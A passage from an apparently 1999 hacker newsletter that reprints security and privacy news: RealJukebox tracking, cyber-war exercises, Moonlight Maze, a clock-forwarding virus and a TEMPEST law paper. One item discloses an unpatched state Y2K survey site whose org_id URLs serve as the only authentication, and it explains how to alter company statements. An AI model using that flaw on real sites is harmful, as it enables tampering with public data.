numbers from unsuspecting consumers and corporations' buying agents. An even simpler approach for perpetrators is that for less than $100, they can register the name of popular domains. By just changing an "o'' in a Web site name to a zero, they can set up a fraudulent site. Earlier this year, a would-be hacker registered the domain "Micr0soft,'' but it was discovered before any damage was done. However, there have been a handful of highly publicized cases. Earlier this year, hackers posted a false financial news story about PairGain, a California-based communications company, making it look as if the story appeared on the Bloomberg financial news service Web site. The bogus story, which said that PairGain was being bought by a well-known telecommunications company, sent PairGain's stock rocketing and then free-falling. Ed Scannell is an InfoWorld editor at large. @HWA 07.0 Hacker or Cracker or Neither. Which Word to Use? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Ex Machina The Providence Journal takes a stab at trying to define the difference between the words 'hacker' and 'cracker'. Unfortunately they fail miserably. At this point people should just give up and use other words all together. There are enough other words available that can be used instead of confusing people with words which mean different things to different people. The Providence Journal http://www.projo.com/report/pjb/stories/02732702.htm 10.31.99 00:04:53 BOB KERR What used to be a bad thing is now a good thing Just because someone is a hacker doesn't mean he, or she, is a bad person. In fact, some people wear the term with pride. They put it on their business cards. But a cracker is something else entirely. A cracker is a hacker gone bad. A hacker is a computer ace who uses the computer to make the world a better place. A cracker is a computer ace who uses the computer for evil. (And just to make this perfectly clear, when speaking of a ``cracker'' we are not referring to a man of the South with a Jesse Helms bumper sticker on his pickup and a slow, easy way of making a point.) There was a time, maybe a couple of months ago, when ``hacker'' was clearly a bad thing to call somebody. A hacker was cheap, devious, mediocre. But, by some proclamation within the Computer Nation, the hacker is now good, not bad. It's in all the fan magazines, the ones that have things on their covers like the ``all-new iMac with speeds of up to 400MHz.'' The conversion of the hacker is reminiscent of that undergone by Randy ``Macho Man'' Savage, a villain who became a hero in the World Wrestling Federation. That was in all the fan magazines, too. Put another way, a hacker is a guy who gets to a firewall and stops. A cracker is a guy who gets to a firewall and figures out a way to go through it. A firewall? You thought it was something to keep a fire from spreading through a building? Not anymore. It's something to keep a cracker from spreading through a Web site. What brought all these tortuous twists in terminology to light is a recent case in East Greenwich in which the police reported that they had tracked down a 15-year-old high-school student suspected of using a home computer to go on the Internet and portray a local teacher as a molester of children and animals. The student allegedly entered an open, unsecured Web site that teachers use to post homework assignments and class notes and refer students to other helpful Web sites. And, in a technological way, the student painted the teacher ugly. The police found the young techno-trespasser easily. They traced him through an America Online account right to his front door. And that means this kid has zero status among hackers, and probably crackers, as well. He just didn't have to do enough to get where he wanted to go. And the police didn't have to do enough to catch him. In the mad, twitchy passions that fuel Internet addictions, there are clearly some showboats. They can go places others can't. And, as surely as soaring kings of playground basketball, they need to make it clear that there is a big difference between their moves and those of a plodding, earthbound kid. Those who have put in hundreds of long, lonely hours with a computer mouse and a bug-eyed lock on the computer screen might end up a little pale and prone to a nervous blink. But they still want to strut their stuff. As soon as the story of the East Greenwich Internet abuser became public, hackers responded. They didn't want anyone confusing a four- or five-click after-school romp on the Internet with the simply amazing things they can do with a computer. They clearly resented any implication that the kid was even playing the same game. ``A simple prank which required very little sophistication to carry out'' is what one proud hacker disdainfully called the East Greenwich caper. The same hacker also provided the information that anyone with a butt-kicking hard drive probably already knew: the hacker is good; the cracker is bad. It's so difficult to keep pace. You grow up remembering the nasty little brute from down the block who beat your arms black and blue during pickup basketball games. And you thought of him as one thing, and one thing only: a hacker. Now, who's to know? The Internet has changed everything. The hacker is different from what he used to be. Maybe the hack is, too. Bob Kerr can be reached by E-mail at bkerr@projo.com. @HWA 08.0 New Virus Discovered in London ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by nvirB The London Sunday Times is reporting that a new virus is spreading throughout London firms and beyond that advances a system clock several months. This causes time sensitive passwords to expire forcing users to reenter them. Somehow the origin of the virus has been traced to Bulgaria, Romania and Scandinavia. While this is a long article there really isn't much technical information supplied the Times seems to just be spreading Fear and not valuable information. (If anyone has more accurate and verifiable information on this we would like to hear it.) The London Sunday Times http://www.sunday-times.co.uk/news/pages/sti/99/10/31/stinwenws01032.html?999 October 31 1999 BRITAIN E-virus turns clocks to 2000 Mark Macaskill BRITISH companies are being attacked by mystery hackers with a virus that dupes computers into thinking that the millennium has already arrived. The bug, which forwards internal computer clocks to January 1, 2000, is capable of crippling systems for up to three days, during which time valuable data can be stolen or wiped out. Security software experts have been called in to combat the threat posed by the virus. They believe it is capable of overpowering almost all computers, including Y2K- compliant systems which have been deemed ready for the rollover to the new millennium. D K Matai, managing director of mi2g, a security software company which advises many of London's financial institutions, said: "Hackers are causing chaos with this code because it can immediately shut down computer systems. There are not just financial risks to be considered; serious safety issues are also involved." The virus, known as a clock-forwarding code, has been unleashed on companies in America and Europe. Experts have traced its origin to Bulgaria, Romania and Scandinavia but have been unable to identify the hackers. The virus is typically disguised as an e-mail or file and can lie undetected in computer systems indefinitely, enabling an individual hacker to attack hundreds of companies simultaneously, a practice known as "flooding". On activation, internal clocks can be forwarded months, fooling computers into thinking that software programmes and passwords, which in reality are valid, have expired. Last month it was detected in Britain for the first time after a company reported that it was unable to access 40% of its system. It took three hours to resume operations, by which time thousands of pounds' worth of damage had been caused. During a recent conference on electronic security held by mi2g, it was revealed that Y2K-compliant systems were also under threat. Tests carried out earlier this year on an oil rig and car plant, both classified as millennium-compliant, in which clocks were forwarded to the millennium date, caused up to 40% of computers to fail. Small to medium-sized companies, which do not have security software to protect their central clocks, are thought to be particularly vulnerable. @HWA 09.0 Krystalia, In Memorium ~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Netmask A well know hacker, Krystalia, passed away Friday from Cancer. She was a good friend to many people. You may have met her at one of the Defcon Conventions, or just talked to her online. She was a very intelligent and loving girl. She will never be forgotten, and will be missed by many. A tribute site has been set up and they are asking for contributions of kind words, pictures, or writings. http://www.krystalia.org/ @HWA 10.0 RealNetworks Changes Privacy Policy Amid Controversy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by AlienPlague, Atropsy, and Hamartia It has been learned that RealNetworks' RealJukebox software monitors users and sends the data it collects back to the company. The data collected includes user listener habits, what file types the user plays, and a globally unique identifier (GUID), among other things. RealNetworks never informed anybody of these facts, but claims that this is not an invasion of privacy. (Ummm, yeah.) C|Net http://news.cnet.com/news/0-1005-200-1425866.html?tag=st.ne.1002.thed.1005-200-1425866 ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2385034,00.html?chkpt=zdhpnews01 Late Sunday evening, after the above story broke, RealNetworks changed its privacy policy to reflect the new data being collected. The voluntary privacy watchdog group Truste has been called on to investigate the matter. Privacy advocates will closely watch Truste's actions since they question if the industry can adequately police itself. (RealJukebox may be free software but we question what you are really paying for it.) C|Net http://home.cnet.com/category/0-1005-200-1426044.html Is RealNetworks software keeping tabs on user habits? By Reuters Special to CNET News.com November 1, 1999, 3:55 a.m. PT NEW YORK--RealNetworks' RealJukebox software monitors users' listening habits and some other activities and reports the information and the user's identity to the company, according to reports. A security expert intercepted and examined information generated from the program, and company executives acknowledged that RealJukebox gathers information on what users are playing and recording, the New York Times said. RealJukebox is used to play compact discs on computers and can copy music to a user's hard drive and download music from the Internet. Dave Richards, RealNetworks' vice president for consumer products, told the Times the company gathered the information to customize service for individual users. He and other company executives said the practice did not violate consumer privacy because the data was not stored by the company or released to other companies, the Times said. But privacy advocates and security experts agreed that it was a violation of the privacy of the 13.5 million registered users of RealJukebox, the Times said, particularly because RealNetworks has not informed consumers they are being identified and monitored. Richard Smith, a Brookline, Massachusetts-based independent security consultant, said the numbers of songs stored on a user's hard drive, the kind of file formats in which the songs are stored, the user's preferred genre of music, and the type of portable music player, if any, the user has connected to the computer are sent to the company, the Times said. In addition, a personal serial number known as a globally unique identifier, or GUID, is also sent to RealNetworks, the paper said. The fact that RealNetworks gathers the information is not mentioned in the privacy policy posted on its Web site, the Times said, or in the licensing agreement users must approve when installing RealJukebox. -=- ZDNet; -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- RealNetworks is watching you By Reuters November 1, 1999 4:51 AM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2385034,00.html?chkpt=zdnntop NEW YORK -- RealNetworks Inc.'s RealJukebox software monitors user listening habits and other activities and reports the information and the user identity to the company, the New York Times said. A security expert intercepted and examined information generated from the program, and company officials acknowledged that RealJukebox gathers information on what users are playing and recording, the Times said. RealJukebox is used to play compact disks on computers and can copy music to a user's hard drive and download music from the Internet. Violation of privacy? Dave Richards, RealNetworks' (Nasdaq:RNWK) vice president for consumer products, told the Times that the company gathered the information to customize service for individual users. Richards and other company officials said the practice did not violate consumer privacy because the data was not stored by the company or released to other companies, the Times said. But privacy advocates and security experts agreed that it was a violation of the privacy of the 13.5 million registered users of RealJukebox, the Times said, particularly because RealNetworks has not informed consumers they are being identified and monitored. Richard Smith, a Brookline, Mass.-based independent security consultant, said the numbers of songs stored on a user's hard drive, the kind of file formats in which the songs are stored, the user's preferred genre of music, and the type of portable music player, if any, the user has connected to the computer are sent to the company, the Times said. In addition, a personal serial number known as a globally unique identifier, or GUID, is also sent to RealNetworks, the paper said. The fact that RealNetworks gathers the information is not mentioned in the privacy policy posted on its Web site, the Times said, or the licensing agreement users must approve when installing RealJukebox. CNet; RealNetworks changes privacy policy under scrutiny By Courtney Macavinta Staff Writer, CNET News.com November 1, 1999, 10:40 a.m. PT update RealNetworks quietly changed its privacy policy this weekend to disclose a controversial practice of tracking Net music listeners through unique identification numbers assigned to its software. The practice was reportedly discovered by Richard Smith, a Massachusetts-based independent security consultant, who had examined information generated from RealNetworks' RealJukebox software. The story was first reported in this morning's editions of the New York Times. The company confirmed today that an identifier existed that could be used to keep tabs on what users are playing and recording. Although many Web sites track users' habits, RealNetworks had not previously disclosed its practices in its privacy policy, which is certified by the Web privacy seal program Truste. Without explanation this weekend, RealNetworks added a section to its privacy policy stating that users are assigned a "Globally Unique Identifier" (GUID) when they download its RealJukebox software to copy or play digital music via their computers. RealNetworks confirmed that the policy was changed and that it would release details about it later today. "I don't know when that change took place, but we'll get a response out by noon," RealNetworks chief operating officer Thomas Frank said today. "Any of the information we've been collecting has been designed to make the best experience for the user." While writing a letter to Truste calling for an investigation of RealNetworks' privacy practices, Jason Catlett, founder of Junkbusters, a clearinghouse for privacy-protection measures, discovered that the policy had been changed. "When I was writing that letter on Sunday night, I found that suddenly the GUID was described in their policy, and that wasn't there on Friday, because I have a copy of the policy that was there on Friday," Catlett said in an interview. The revised privacy policy makes clear how the GUID is used. "We may use GUIDs to understand the interests and needs of our users so that we can offer valuable personalized services such as customized RealPlayer channels," the new policy states. "GUIDs also allow us to monitor the growth of the number of users of our products and to predict and plan for future capacity needs for customer support, update servers, and other important customer services." Privacy advocates warn that user IDs can be used to build profiles on Net users, combining surfing habits with personal information such as the home addresses and credit card numbers gathered by RealNetworks in its licensing agreement with RealJukebox users. The profiles could be used for marketing, but if they are stored by a company they also could be subpoenaed by law enforcement officials during an investigation. Although the policy discloses the practice, Catlett says that the practice is still invasive and that Truste should reprimand the company. "It's shameful and unacceptable that they are tracking people like packages without telling them," he said. "I have asked Truste to determine whether this is a breach." Truste, which licenses out its privacy seals and monitors whether companies are in compliance with their data-collection policies, said today that it will investigate RealNetworks' practices. "Anytime the privacy statement changes, it's of critical concern for us because we certify that the practices are in line with the policy," said Dave Steer, Truste's communications manager. "We will look at whether they knew what they were doing, why they were doing it, and [whether] they intentionally left it out of their statement until there was public outcry," he added. "We are really concerned about what is going on, and we're going to look at whether RealNetworks is breaching its contract with Truste." Another test for self-regulation How Truste handles the RealNetworks complaint will be closely watched by privacy advocates, who have long contended that industry guidelines are no substitute for stricter consumer-protection laws. Voluntary programs such as Truste have been lauded by the White House and the Net industry as a key solution for protecting consumers' online privacy, but consumer groups argue that they lack enforcement. If a site fails to comply with its Truste-certified privacy policy, it could have its privacy seal revoked, or in the worst case a complaint could be filed with the Federal Trade Commission. But as the RealNetworks privacy policy switch also shows, sometimes the policies themselves are not true reflections of a company's online data-collection practices, or they may not be detailed enough. This is not uncommon, according to a study released in May by Mary Culnan of Georgetown University's McDonough School of Business. Culnan's Georgetown Internet Privacy Policy Survey examined 364 ".com" sites that were randomly selected from the 7,500 most-visited Web sites. Although 65.7 percent of the sites have privacy policies or give notice that personal information has been securely transmitted, only 9.5 percent of the sites had an "adequate" privacy policy, the study found. @HWA 11.0 JTF-CND Runs CyberWar Simulation ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Punkis Joint Task Force-Computer Network Defense (JTF-CND) conducted a cyber-war game in early October of this year. The effort was named Zenith Star and was the first such simulation since Eligible Receiver in 1997. Participants in the exercise included representatives from NSA, CIA, FBI, Defense Department and other agencies. The war game included powergrid blackouts, 911 emergency system outages, disrupting crucial Pentagon computer networks and other situations. (This article also regurgitates the story about the SPAWAR printer whose print jobs where redirected to Russia. We would love to have more information on that security hole if anyone has it.) LA Times http://www.latimes.com/news/asection/19991031/t000098778.html U.S. Scurries to Erect Cyber-Defenses Security: As threat rises, government task force prepares for Internet combat. By BOB DROGIN, Times Staff Writer FT. MEADE, Md.--Distant forests dominate the view from the eighth-floor director's suite at the National Security Agency, America's largest intelligence gathering operation. But the talk inside is of a more troubling horizon: cyberspace. "Think of it as a physical domain, like land, sea and air," said Air Force Lt. Gen. Michael V. Hayden in his first interview since taking the NSA's helm in May. "Now think of America conducting operations in that new domain." These days, many in the U.S. intelligence, law enforcement and national security community are thinking of little else. The Pentagon has stepped up cyber-defense and is planning cyber-combat. The FBI is still struggling to unravel Moonlight Maze, a massive assault on U.S. government computers that has been traced to Russia. Prodded by the White House, other agencies are also scrambling to protect America's electronic infrastructure from a daily digital barrage from around the world. The stakes could not be higher. Put simply, how can an increasingly wired America best defend itself from hostile nations, foreign spies, terrorists or anyone else armed with a computer, an e-mail virus and the Internet? And how can America fight back in the strange new world of warp-speed warfare? The answers so far are not encouraging. "The pace of technological change is rapidly outstripping our existing technical edge in intelligence that has long been one of the pillars of our national security," said CIA Director George J. Tenet. The United States faces "a growing cyber-threat" from "weapons of mass disruption," Tenet said. "Potential targets are not only government computers but the lifelines that we all take for granted: our power grids and our water and transportation systems." That threat is why 50 experts from the NSA, CIA, FBI, Defense Department and other agencies gathered in early October in a drab office building in Falls Church, Va., for a classified war game that was code named Zenith Star. For two days, they huddled behind closed doors to test America's response to a simulated surprise attack by electronic evildoers--the first such effort since a 1997 exercise found the U.S. government almost defenseless in cyber-war. This time, enemy hackers supposedly had triggered blackouts around major military facilities near Chicago, Honolulu and Tampa, Fla. They paralyzed 911 emergency response systems with a flood of computer-generated calls. Then they started disrupting crucial Pentagon computer networks. The mock scenario was "based on actual vulnerabilities," explained Air Force Maj. Gen. John H. Campbell, who ran Zenith Star as head of the Pentagon's new Joint Task Force-Computer Network Defense in Arlington, Va. Although results are not in, Campbell said, he believes coordination and cooperation have improved since Eligible Receiver, the classified 1997 war game that found America unprepared for cyber-attack. In that exercise, a team of NSA hackers proved that they could easily disable power, telephones and oil pipelines across the country, as well as Pentagon war-fighting capabilities. The joint task force was one result. Operational since June, it aims to organize defense of the Pentagon's 2.1 million computers, 10,000 local networks and more than 100 long-distance networks. The unit formally became part of the Pentagon's combat mission on Oct. 1, when it was attached to U.S. Space Command, based in Colorado Springs, Colo. A separate task force will be established next October to safeguard against computer network attack, Campbell said. Now the computer defense force runs a 24-hour operations room that looks like the set of a Hollywood thriller. Inside the Secure Compartmented Information Facility, a dozen experts tend banks of classified and unclassified computers. Red digital clocks on the ceiling show time zones around the world. Three huge screens on one wall monitor major military computer nodes in the United States, Europe and the Pacific. Three other large screens are tuned to TV networks. Campbell, a veteran fighter pilot, sees cyberspace as the wild new yonder. Donning his worn leather flight jacket for an interview in a drafty task force office, he warned that terrorists rely increasingly on computers for planning and communication. "We see more and more terrorist organizations . . . are recruiting computer-smart people and even providing the training for them," Campbell said. Most attacks on U.S. government computers have involved politically motivated vandalism, not terrorism. During the Kosovo conflict last spring, for example, the White House and numerous other government departments and agencies were forced to take down Web sites after hackers defaced them with electronic graffiti. But the hackers are more malicious and more powerful than ever. Despite the increased protection, two unknown groups used multiple simultaneous attacks last week to penetrate and deface 13 government and military sites, including the U.S. Army Reserve Command, the White Sands Missile Range, the National Aeronautics and Space Administration's Jet Propulsion Laboratory, the National Defense University and the Naval Coastal Systems Center. To be sure, U.S. officials insisted that no one has stolen military or other national security secrets by penetrating a classified computer system from outside. But it clearly is not for want of trying. Consider the Navy's Space and Naval Warfare Systems Command Center in San Diego, which helps safeguard naval intelligence codes. Its unclassified computer systems, a senior official said, are "under constant attack, more than one a day from outside the country." Spawar, as it is commonly called, has traced hackers this year alone to Argentina, Australia, Brazil, Britain, China, France, Italy, Israel, Japan and Russia. Most use programs to electronically "sweep" the Spawar systems, looking for unguarded access points. "For every protection we put up, they find a way around it," he said. "Many get in, rummage around, package files and send them off. A few gain root access," or complete access to the compromised system. "It's steadily increasing, steadily getting worse." In February, someone even used the Internet to secretly program a new password for a Hewlett-Packard printer at Spawar so that copies would print out in Russia. The intrusion was detected before sensitive files were lost, the official said. In that case, as in most, officials never determined whether a curious teenager, a foreign intelligence agency or someone else was responsible for the intrusion. "Often you don't know what you're dealing with until you're pretty far along in an investigation," said Michael A. Vatis, America's top cyber-cop. "You don't know if you have a single intrusion or a concerted attack." Vatis heads the FBI's National Infrastructure Protection Center, the focal point of the federal government's effort to prevent, detect and prosecute cyber-crimes. The center has 800 pending hacker, virus and intrusion cases, up from 200 two years ago. Most involve disgruntled employees who sabotage computer systems for revenge or crooks who use the Internet for scams and fraud. But Vatis said that he worries most about what he calls "America's Achilles' heel," the growing reliance on computer-controlled systems built for efficiency, not security. "We know other countries are building information warfare technology," he said at the headquarters of the infrastructure protection center, a warren of computer cubicles on the 11th floor of the FBI building in Washington. "We know countries are engaged in espionage and economic espionage." The FBI, for example, has tried to determine if cyber-spies at Moscow's prestigious Russian Academy of Sciences are responsible for Moonlight Maze, the most pervasive assault yet on sensitive U.S. Defense Department and other computer networks. The first Moonlight Maze attack was detected in March 1998. Three months later, U.S. security sleuths were able to monitor a series of intrusions as they occurred and traced them back to seven dial-up Internet connections near Moscow. But the intense attacks continued until at least last May, and the FBI investigation remains open. One reason: U.S. officials are unable to determine if the trail really stops in Moscow or simply appears to. Either way, the Moonlight Maze attack was enormous. U.S. officials said that the intruders systematically ransacked hundreds of essential but unclassified computer networks used by the Pentagon, the Energy Department, NASA, defense contractors and several universities. Vast amounts of technical defense research were illegally downloaded and transferred to Russia. Investigators found that the hackers used workstations running Sun operating systems and routed high-speed calls through U.S. university network servers to hide their tracks. They usually logged into government computer systems with stolen passwords. Attacking from within, they gained root access to numerous systems. The intruders also sometimes created illegal "back doors" to secretly reenter the compromised systems, the evidence showed. They also installed "sniffers," which let them monitor sensitive communication along U.S. government networks, thus sending Russia e-mail as well as other sensitive information stored in compressed data files. One private-sector target was Meganet Corp., which is based in Tarzana and sells 21 versions of commercial encryption software that it bills as "unbreakable." U.S. export controls prohibit sale of the software overseas, the company says. In two overnight attacks in July 1998, Meganet's Web servers were swamped with "tens of thousands" of hits from "Lab 1313," an unknown group that used an Internet connection from the Russian Academy of Sciences, according to Michael Vaknin, the company's general manager. He said that the attackers sought source code for the encryption software but failed because it is kept on a separate system. Not long ago, few Americans outside the secretive National Security Agency were concerned with the esoteric field of encryption or the theft of digital data. The high-tech NSA, which does the government's code making and code breaking, is responsible for the covert collection of signals intelligence, or "Sigint," from around the world. The explosion of new computer and communications technology has given the intelligence agency powerful new tools--but it has also made the agency's job much more difficult. Hayden, the NSA director, conceded, "It was easier to be top dog before." @HWA 12.0 State Y2K Data Vulnerable ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by CyberDiva Currently, a state government web site is providing information on that states computer system preparedness levels. This information is made freely available to the general public. You, as a web surfer, may go and review this information. You can view the status of Public Utilities (gas, water, power), Health Care Providers, the 911 system, Telecommunications, etc. Then because the site is configured incorrectly you can change the information to read whatever you like. (Talk about Y2K panic.) NewsTrolls http://newstrolls.com/news/dev/guest/110199.htm UPDATE 12:45PM EST Tuesday,Nov. 2: It appears someone has changed the Y2K survey URLs so they no longer include the org_id; however, the old URLs which include the org_id are still functional and entering the org_id numbers into the Y2K Survey update box will still enable anyone with an id to alter a company's Y2K Survey Data. Unless companies are given new org_ids for their Y2K Surveys and old URLs containing the org_id are rendered inoperable, the security hole is still intact... diva Note: As of 9AM EST Monday, neither NewsTrolls nor NetworkCommand has heard back from anyone related to the site. We have been trying to contact them since last Friday. For security reasons we are not publishing which US state has the following security hole so that Y2K surveys already entered will not be compromised. Unfortunately, the ability to exploit the hole still exists. Y2K State Surveys Security Hole By Mike of NetworkCommand Overview: ========= Y2K information subject to exaggeration or gross understatement. Issue: ====== Because no one is really sure what to expect, be sure to expect the unexpected. Platform Effected: ================== Earth. Summary: ======== Currently, a State Government web site is providing Y2K Preparedness information to the general public. You, as a citizen, may go and review this information. You can view the status of Public Utilities (gas, water, power), Health Care Providers, the 911 system, Telecommunications, etc. You can read what you might expect: -We're almost done. -We do not impact essential functions. You can read what you might not expect: 2) Do you have, manufacture, or distribute any equipment controlled by computers? NO 3) If you answered "yes" to the above question, can failure of computer controlled equipment cause untreated sewage to be released to the environment or an interruption of service? YES So, does this company have any computers? Or, could the failure of those computers they don't have cause the the untreated sewage to be released? Even more, this one from a Natural Gas Company: 3) What is the date that the Y2K project started? (mm/dd/yyyy) 11/1998 Contingency Plan Development Start Date (mm/dd/yyyy) 12/1997 Aren't those backwards? Don't you have to start the project before you make a Contingency Plan? Are you guessing? Anyway, as you can see I'm not sure these people can be trusted with paperwork. Now here's the kicker. These Preparedness statements are available online. If you're a company, you can fill one out. If you're a citizen, you can review them. However, due to an error in the web sites code, if you can find an org_id, you can submit a Preparedness statement. An org_id looks like this: view.cgi?org_id=14633927754506433&round=2 And guess what they are using for authenication? You got it, the org_id. Someone who wanted to modify these statements could get the org_id and click the button called "Submit Preparedness Statement." They could then change an existing statement or send in a new one. Please bear in mind, this is all in accordance with a state law. At this time multiple attempts have been made to contact the administrators of this web site and inform them of the problem. Hopefully no one will modify these documents in the meantime. I doubt they have any tape backups. The moral of this story? If I have to spell it out, it wouldn't make sense to you anyway... Mike NetworkCommand.com (when you can't just pull the plug) @HWA 13.0 Clinton Privacy Plan: Is it Enough? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Maggie President Clinton has unveiled a privacy plan aimed at protecting the privacy of individually identifiable health information. The plan would require health plans to get consent before releasing electronic medical records, requires patient notification of use of records, and it would let patients view and correct their records. The rules are slated to go into effect on Feb. 21, 2000, after public comment on the issue. (This is at least a first step. There is so much further to go.) ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2384723,00.html?chkpt=zdnntop Department of Health and Human Services - Contains Full Text and Summary of the Proposal http://aspe.hhs.gov/admnsimp/ ZDNet; -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Clinton privacy plan: only a first step By Lisa M. Bowman, ZDNN October 29, 1999 4:18 PM PT URL: In an attempt to prevent strangers from snooping at your online medical records, President Clinton Friday unveiled a plan that would place restrictions on how electronic medical information is used. The plan would require health plans to get consent before releasing electronic medical records in most cases, and requires them to notify patients about how their records are used. It also would let patients view and correct their records. The rules are slated to go into effect on Feb. 21, 2000, after public comment on the issue. During his speech introducing the plan, Clinton acknowledged that electronic medical records can help save lives and lower costs. But he said that shouldn't be at the expense of privacy. Horror stories "Every American has a right to know that his or her medical records are protected at all times from falling into the wrong hands," Clinton said in a prepared statement from the Oval Office. "As they have been stored electronically, the threats to our privacy have substantially increased." As more and more records have been transferred into electronic form, horror stories about the release of medical records have alarmed consumers and privacy advocates. During his speech, Clinton cited a survey showing that one-third of all Fortune 500 companies check medical records before they hire or promote people. "This is wrong," he said. "Americans should never have to worry that their employers are looking at the medications they take or the ailments they've had." Hacker attack In September, hackers circulated a phone number that allowed anyone to access a database of private medical records stored at St. Joseph Mercy Hospital in Pontiac, Michigan. The hospital had been using a digital system that let doctors dictate medical records. Congress does not need to pass the Clinton plan because it missed a self-imposed August deadline requiring it to address online privacy or cede decisions on the issue to the secretary of health and human services. Praise from privacy advocates Privacy advocates and medical community members lauded the proposed rules as a first step toward ensuring that online medical records won't fall into the hands of marketers, corporate Big Brother types or the merely nosy. But they said the rules are only the first in a series of measures needed to truly protect the records. "This is a wonderful start," said Dr. Michael Rozen, Director of Health Record Security for WellMed Inc. "With all of its limitations -- it only covers electronic records, it doesn't really protect consumers surfing sites -- the bottom line is this is more protection than we've ever seen," he said. Rosen said his company, which makes software that lets people access health information, already is more strict with medical data than would be required under the Clinton plan. While the Clinton rules outline how health care sites and the medical community must deal with electronic records, they don't address scenarios when law enforcement is seeking access to them. They only apply to electronic, not paper, records. And they also don't restrict general health sites from sharing information about their visitors. For example, a health site containing information about AIDS or drug addiction can still freely release information about people who visit those sections. Nevertheless, Rozen said the Clinton plan should boost consumer confidence in medical sites because people can rest assured their medical records are safe. "It will do a great deal to provide consumers some protections for their medical records in electronic form," Rozen said. The new rules come as major players in the tech industry are jumping into the medical market. Two weeks ago Intel Corp. joined American Medical Association on a project that will let doctors and consumers exchange online medical records. That plan includes digital credentials for doctors exchanging information over the Internet. @HWA 14.0 Tempest Laws Reviewed ~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Christopher J. Seline has released the draft of paper that explains the legalities of eavesdropping on the electromagnetic emanations of digital equipment (TEMPEST). The paper covers the laws in Canada, England and the United States. There is also recommendations for any future laws and a complete bibliography. Cryptome http://cryptome.org/tempest-law.htm Date: Fri, 19 Jan 90 19:13:44 -0500 From: cjs%cwru@cwjcc.ins.cwru.edu (Christopher J. Seline (CJS@CWRU.CWRU.EDU)) The following is a prepublication draft of an article on TEMPEST. I am posting it to this news group in the hope that it will: (1) stimulate discussion of this issue; (2) expose any technical errors in the document; (3) solicit new sources of information; (4) uncover anything I have forgotten to cover. I will be unable to monitor the discussions of the article. Therefore, PLEASE post your comments to the news group BUT SEND ME A COPY AT THE ADDRESS LISTED BELOW. I have gotten a number of mail messages about the format of this article. Some explanation is in order: The numbered paragraphs following "____________________" on each page are footnotes. I suggest printing out the document rather than reading it on your CRT. Thanks you in advance. Christopher Seline cjs@cwru.cwru.edu cjs@cwru.bitnet (c) 1990 Christopher J. Seline ============================================================================= Eavesdropping On the Electromagnetic Emanations of Digital Equipment: The Laws of Canada, England and the United States Christopher J. Seline This document is a rough draft. The Legal Sections are overviews. They will be significantly expanded in the next version. We in this country, in this generation, are -- by destiny rather than choice -- the watchmen on the walls of freedom.[1] - President John F. Kennedy In the novel 1984, George Orwell foretold a future where individuals had no expectation of privacy because the state monopolized the technology of spying. The government watched the actions of its subjects from birth to death. No one could protect himself because surveillance and counter-surveillance technology was controlled by the government. This note explores the legal status of a surveillance technology ruefully known as TEMPEST. Using TEMPEST technology the information in any digital device may be intercepted and reconstructed into useful intelligence without the operative ever having to come near his target. The technology is especially useful in the interception of information stored in digital computers or displayed on computer terminals. The use of TEMPEST is not illegal under the laws of the United States, or England. Canada has specific laws criminalizing TEMPEST eavesdropping but the laws do more to hinder surveillance countermeasures than to prevent TEMPEST surveillance. In the United States it is illegal for an individual to take effective countermeasures against TEMPEST surveillance. This leads to the conundrum that it is legal for individuals and the government to invade the privacy of others but illegal for individuals to take steps to protect their privacy. I. INTELLIGENCE GATHERING Spying is divided by professionals into two main types: human intelligence gathering (HUMINT) and electronic intelligence gathering (ELINT). As the names imply, HUMINT relies on human operatives, and ELINT relies on technological operatives. In the past HUMINT was the sole method for collecting intelligence. The HUMINT operative would steal important papers, observe troop and weapon movements, lure people into his confidences to extract secrets, and stand under the eavesdrip of houses, eavesdropping on the occupants. As technology has progressed, tasks that once could only be performed by humans have been taken over by machines. So it has been with spying. Modern satellite technology allows troop and weapons movements to be observed with greater precision and from greater distances than a human spy could ever hope to accomplish. The theft of documents and eavesdropping on conversations may now be performed electronically. This means greater safety for the human operative, whose only involvement may be the placing of the initial ELINT devices. This has led to the ascendancy of ELINT over HUMINT because the placement and monitoring of ELINT devices may be performed by a technician who has no training in the art of spying. The gathered intelligence may be processed by an intelligence expert, perhaps thousands of miles away, with no need of field experience. ELINT has a number of other advantages over HUMINT. If a spy is caught his existence could embarrass his employing state and he could be forced into giving up the identities of his compatriots or other important information. By its very nature, a discovered ELINT device (bug) cannot give up any information; and the ubiquitous nature of bugs provides the principle state with the ability to plausibly deny ownership or involvement. ELINT devices fall into two broad categories: trespassatory and non-trespassatory. Trespassatory bugs require some type of trespass in order for them to function. A transmitter might require the physical invasion of the target premises for placement, or a microphone might be surreptitiously attached to the outside of a window. A telephone transmitter can be placed anywhere on the phone line, including at the central switch. The trespass comes either when it is physically attached to the phone line, or if it is inductive, when placed in close proximity to the phone line. Even microwave bugs require the placement of the resonator cone within the target premises. Non-trespassatory ELINT devices work by receiving electromagnetic radiation (EMR) as it radiates through the ether, and do not require the placement of bugs. Methods include intercepting information transmitted by satellite, microwave, and radio, including mobile and cellular phone transmissions. This information was purposely transmitted with the intent that some intended person or persons would receive it. Non-trespassatory ELINT also includes the interception of information that was never intended to be transmitted. All electronic devices emit electromagnetic radiation. Some of the radiation, as with radio waves, is intended to transmit information. Much of this radiation is not intended to transmit information and is merely incidental to whatever work the target device is performing. This information can be intercepted and reconstructed into a coherent form. With current TEMPEST technology it is possible to reconstruct the contents of computer video display terminal (VDU) screens from up to a 